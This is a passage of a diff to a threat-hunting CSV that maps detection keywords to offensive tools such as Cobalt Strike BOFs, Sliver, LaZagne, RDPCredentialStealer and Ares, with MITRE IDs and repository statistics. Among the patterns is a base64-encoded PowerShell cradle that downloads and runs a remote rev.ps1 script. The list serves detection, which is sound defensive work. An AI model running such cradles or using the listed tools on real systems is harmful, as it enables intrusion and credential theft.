attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*APIHookInjectorBin.exe*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.log*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.pdb*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.sln*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*apokryptein/secinject*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" -"*apop2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*apop2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*appdata*\Windows:svchost.exe*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*appdata*\Windows:winrm.vbs*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*applenotes2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Applet_ReverseTCP.jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*Application.Lazagne.H*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*applenotes2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Applet_ReverseTCP.jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Application.Lazagne.H*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*applocker_enum*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*applocker-enumerator*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*apt install crunch*","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*apt install gpp-decrypt*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*apt install hyperion*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*apt install polenum*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" -"*apt install set -y*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*apt install set -y*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" "*apt install wce*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*APT stands for Advanced Persistence Tomato*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" -"*apt* install john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*apt* install john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*apt/etumbot.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*apt/putterpanda.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*apt1_virtuallythere.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*APT64/EternalHushFramework*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" -"*apt-get -y install tor *","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*apt-get -y install tor *","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" "*APTortellini/unDefender*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" -"*APTSimulator*","offensive_tool_keyword","APTSimulator","APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is deisgned to make the application as simple as possible. You don't need to run a web server. database or any agents on set of virtual machines. Just download the prepared archive. extract and run the contained Batch file as Administrator. Running APT Simulator takes less than a minute of your time.","T1036 - T1059 - T1562 - T1027 - T1003","TA0001 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/NextronSystems/APTSimulator","1","1","N/A","N/A","10","2272","414","2023-06-16T08:48:25Z","2018-02-03T14:19:42Z" +"*APTSimulator*","offensive_tool_keyword","APTSimulator","APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is deisgned to make the application as simple as possible. You don't need to run a web server. database or any agents on set of virtual machines. Just download the prepared archive. extract and run the contained Batch file as Administrator. Running APT Simulator takes less than a minute of your time.","T1036 - T1059 - T1562 - T1027 - T1003","TA0001 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/NextronSystems/APTSimulator","1","1","N/A","N/A","10","2271","414","2023-06-16T08:48:25Z","2018-02-03T14:19:42Z" "*apypykatz.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" -"*aquatone*","offensive_tool_keyword","aquatone","Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.","T1590 - T1553 - T1002 - T1083 - T1313","TA0009 - TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/michenriksen/aquatone","1","0","N/A","N/A","10","5265","876","2022-05-22T19:49:32Z","2015-11-19T11:30:12Z" -"*archerysec*","offensive_tool_keyword","archerysec","Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. The developers can also utilize the tool for implementation of their DevOps CI/CD environment.","T1190 - T1082 - T1518","TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/archerysec/archerysec","1","0","N/A","N/A","10","2135","507","2023-09-26T14:45:31Z","2017-12-04T12:42:54Z" +"*aquatone*","offensive_tool_keyword","aquatone","Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.","T1590 - T1553 - T1002 - T1083 - T1313","TA0009 - TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/michenriksen/aquatone","1","0","N/A","N/A","10","5266","876","2022-05-22T19:49:32Z","2015-11-19T11:30:12Z" +"*archerysec*","offensive_tool_keyword","archerysec","Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. The developers can also utilize the tool for implementation of their DevOps CI/CD environment.","T1190 - T1082 - T1518","TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/archerysec/archerysec","1","0","N/A","N/A","10","2135","507","2023-10-04T02:00:32Z","2017-12-04T12:42:54Z" "*archive-*.kali.org/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ArchStrike*","offensive_tool_keyword","archstrike","Arch Linux repo containing lots of exploitation tools for pentesters","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://archstrike.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ares.py runserver*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" -"*ares-master.zip*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*ares.py runserver*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*ares-master.zip*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*Args_Invoke_Kerberoast*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*armitage.exe*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" -"*armory install *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install .net-execute*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install .net-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install .net-recon*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install situational-awareness*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install windows-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*armory install windows-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*armory install *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-execute*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-recon*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install situational-awareness*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install windows-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - 